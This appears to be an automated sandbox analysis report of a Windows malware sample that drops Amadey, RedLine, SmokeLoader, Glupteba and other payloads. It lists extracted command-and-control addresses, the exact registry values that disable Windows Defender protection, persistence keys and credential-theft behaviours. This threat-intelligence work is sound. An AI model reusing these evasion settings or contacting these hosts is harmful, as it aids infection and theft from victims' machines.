amadey | 5e28747dd875e98a37142b88afc399cd2298e0943976c542dd8f67c4f5dfd2c6

Analysis

max time kernel
103s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
03-11-2023 05:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe
Size

1.5MB
MD5

3cbd3e3e72635ea641b33fe77996d180
SHA1

c4c440f08796947f6e8a0fa64fcd4c675901a7ed
SHA256

5e28747dd875e98a37142b88afc399cd2298e0943976c542dd8f67c4f5dfd2c6
SHA512

da92b16b9dbb51b146230f96f4efe5b92d75488d9554f2bb0a1909fdd6e9e19d8cc063d9a4d153050ce0c4a2c35229f3cbd11e51f677a82a8ab2e428921cca4c
SSDEEP

49152:YaKW5BKf1AfHE/uuMeS0NX30uOHtZIYoQ:24HEceS0d0MYo

Malware Config

Extracted

Family

smokeloader

Version

2022

http://77.91.68.29/fks/

rc4.i32

Extracted

Family

redline

Botnet

grome

77.91.124.86:19084

Extracted

Family

amadey

Version

3.89

http://77.91.124.1/theme/index.php

Attributes

install_dir
fefffe8cea
install_file
explothe.exe
strings_key
36a96139c1118a354edf72b1080d4b2f

rc4.plain

Extracted

Family

redline

Botnet

plost

77.91.124.86:19084

Extracted

Family

redline

Botnet

kedru

77.91.124.86:19084

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

redline

Botnet

pixelnew2.0

194.49.94.11:80

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

DcRat 5 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe
1292	schtasks.exe
8476	schtasks.exe
4224	schtasks.exe
2112	schtasks.exe

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5632-1285-0x0000000002E10000-0x00000000036FB000-memory.dmp	family_glupteba
behavioral1/memory/5632-1321-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/5632-1625-0x0000000002E10000-0x00000000036FB000-memory.dmp	family_glupteba
behavioral1/memory/5632-1906-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/8104-2111-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

AppLaunch.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/236-63-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/memory/4828-646-0x0000000000F50000-0x0000000000F8C000-memory.dmp	family_redline
behavioral1/memory/6344-649-0x0000000000720000-0x000000000075C000-memory.dmp	family_redline
behavioral1/memory/8180-1108-0x00000000005E0000-0x000000000063A000-memory.dmp	family_redline
behavioral1/memory/7196-1212-0x00000000005D0000-0x000000000060E000-memory.dmp	family_redline
behavioral1/memory/7196-1213-0x0000000000400000-0x0000000000461000-memory.dmp	family_redline
behavioral1/memory/7764-1222-0x0000000000030000-0x000000000004E000-memory.dmp	family_redline
behavioral1/memory/8180-1379-0x0000000000400000-0x0000000000480000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/7764-1222-0x0000000000030000-0x000000000004E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

latestX.exe

description	pid	process	target process
PID 8132 created 3252	8132	latestX.exe	Explorer.EXE
PID 8132 created 3252	8132	latestX.exe	Explorer.EXE
PID 8132 created 3252	8132	latestX.exe	Explorer.EXE
PID 8132 created 3252	8132	latestX.exe	Explorer.EXE
PID 8132 created 3252	8132	latestX.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/388-2275-0x00007FF68E9F0000-0x00007FF68EF91000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

298 9120 rundll32.exe
299 3448 rundll32.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

latestX.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts latestX.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

3824 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
298	9120	rundll32.exe
299	3448	rundll32.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

pid	process
3824	netsh.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

kos4.exe40F4.exeUtsysc.exe2A5C.exe5ae7db3.exeexplothe.exe251B.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	kos4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	40F4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	Utsysc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	2A5C.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	5ae7db3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	251B.exe

Executes dropped EXE 44 IoCs

Processes:

Xa7sA84.exeIU3rW06.exeOZ5YJ48.exeAh1bM17.exebz4yx42.exe1rV67Gq5.exe2qw6973.exe3Sg93wL.exe4io760Sn.exe5ae7db3.exeexplothe.exe6ga3oR2.exe7PX9DF05.exeF06B.exeje8Ld4MI.exesZ7wM8YI.exeos2wG0Om.exezS5oH4qY.exe1gH93or0.exeF704.exeF7F0.exe2cy475kA.exe251B.exe2A5C.exeInstallSetup5.exe36E0.exetoolspub2.exe31839b57a4f11171d6abc8bbc4451ee4.exeBroom.exe39FE.exekos4.exelatestX.exetoolspub2.exe40F4.exeLzmwAqmV.exeis-ODC8I.tmpUtsysc.exeIBuster.exeIBuster.exeUtsysc.exeexplothe.exe31839b57a4f11171d6abc8bbc4451ee4.exeupdater.execsrss.exe

pid	process
336	Xa7sA84.exe
2324	IU3rW06.exe
4920	OZ5YJ48.exe
4592	Ah1bM17.exe
1308	bz4yx42.exe
4272	1rV67Gq5.exe
4804	2qw6973.exe
2772	3Sg93wL.exe
4696	4io760Sn.exe
3452	5ae7db3.exe
2216	explothe.exe
472	6ga3oR2.exe
5068	7PX9DF05.exe
4156	F06B.exe
2260	je8Ld4MI.exe
7160	sZ7wM8YI.exe
5032	os2wG0Om.exe
5376	zS5oH4qY.exe
5356	1gH93or0.exe
5516	F704.exe
4828	F7F0.exe
6344	2cy475kA.exe
4880	251B.exe
8180	2A5C.exe
8164	InstallSetup5.exe
7196	36E0.exe
7780	toolspub2.exe
5632	31839b57a4f11171d6abc8bbc4451ee4.exe
7544	Broom.exe
7764	39FE.exe
5092	kos4.exe
8132	latestX.exe
5784	toolspub2.exe
1224	40F4.exe
8240	LzmwAqmV.exe
8532	is-ODC8I.tmp
8332	Utsysc.exe
568	IBuster.exe
8616	IBuster.exe
9172	Utsysc.exe
4092	explothe.exe
8104	31839b57a4f11171d6abc8bbc4451ee4.exe
388	updater.exe
5748	csrss.exe

Loads dropped DLL 7 IoCs

Processes:

36E0.exeis-ODC8I.tmprundll32.exesc.exerundll32.exerundll32.exe

pid process

7196 36E0.exe
7196 36E0.exe
8532 is-ODC8I.tmp
8808 rundll32.exe
888 sc.exe
3448 rundll32.exe
9120 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
7196	36E0.exe
7196	36E0.exe
8532	is-ODC8I.tmp
8808	rundll32.exe
888	sc.exe
3448	rundll32.exe
9120	rundll32.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/7880-2237-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Xa7sA84.exeIU3rW06.exebz4yx42.exesZ7wM8YI.exezS5oH4qY.exe31839b57a4f11171d6abc8bbc4451ee4.exeNEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exeOZ5YJ48.exeAh1bM17.exeF06B.exeje8Ld4MI.exeos2wG0Om.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Xa7sA84.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	IU3rW06.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	bz4yx42.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	sZ7wM8YI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	zS5oH4qY.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NEAS.3cbd3e3e72635ea641b33fe77996d180_JC.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	OZ5YJ48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Ah1bM17.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	F06B.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	je8Ld4MI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	os2wG0Om.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

1rV67Gq5.exe2qw6973.exe4io760Sn.exe1gH93or0.exetoolspub2.exe

description	pid	process	target process
PID 4272 set thread context of 4676	4272	1rV67Gq5.exe	AppLaunch.exe
PID 4804 set thread context of 3100	4804	2qw6973.exe	AppLaunch.exe
PID 4696 set thread context of 236	4696	4io760Sn.exe	AppLaunch.exe
PID 5356 set thread context of 6732	5356	1gH93or0.exe	AppLaunch.exe
PID 7780 set thread context of 5784	7780	toolspub2.exe	toolspub2.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 35 IoCs

Processes:

is-ODC8I.tmplatestX.exe

description	ioc	process
File created	C:\Program Files (x86)\IBuster\Plugins\is-96DPO.tmp	is-ODC8I.tmp
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files (x86)\IBuster\Lang\is-VPVT4.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-EKFL0.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-R45J8.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-R6OTA.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Online\is-C40GP.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Plugins\is-BH3F8.tmp	is-ODC8I.tmp
File opened for modification	C:\Program Files (x86)\IBuster\IBuster.exe	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-LHB27.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-GBMF7.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-7BVTA.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-3JVTM.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Help\is-QU16D.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\is-AMGCR.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-K96D7.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-JV304.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-CFDKS.tmp	is-ODC8I.tmp
File opened for modification	C:\Program Files (x86)\IBuster\unins000.dat	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\is-QL9M3.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-UC36I.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-57JVF.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-CKJV7.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-18DAN.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Online\is-O52JB.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Plugins\is-8B74T.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-84OM0.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-IHEU6.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-MBQ9A.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-9EM8O.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-CM6H9.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\unins000.dat	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-EHOE8.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Lang\is-PMUJ2.tmp	is-ODC8I.tmp
File created	C:\Program Files (x86)\IBuster\Plugins\is-38TSV.tmp	is-ODC8I.tmp

Drops file in Windows directory 2 IoCs

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe

Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2244 sc.exe
6876 sc.exe
7328 sc.exe
9196 sc.exe
888 sc.exe
7504 sc.exe
2156 sc.exe
6708 sc.exe
8276 sc.exe
5012 sc.exe
5156 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2244	sc.exe
6876	sc.exe
7328	sc.exe
9196	sc.exe
888	sc.exe
7504	sc.exe
2156	sc.exe
6708	sc.exe
8276	sc.exe
5012	sc.exe
5156	sc.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3332	3100	WerFault.exe	AppLaunch.exe
6056	6732	WerFault.exe	AppLaunch.exe
8152	7196	WerFault.exe	36E0.exe
8632	5632	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
5680	8104	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub2.exe3Sg93wL.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3Sg93wL.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3Sg93wL.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3Sg93wL.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2112 schtasks.exe
1292 schtasks.exe
8476 schtasks.exe
4224 schtasks.exe

pid	process
2112	schtasks.exe
1292	schtasks.exe
8476	schtasks.exe
4224	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe31839b57a4f11171d6abc8bbc4451ee4.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
